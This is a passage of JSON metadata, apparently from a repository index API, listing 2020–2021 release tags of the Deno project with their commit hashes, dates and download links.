","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.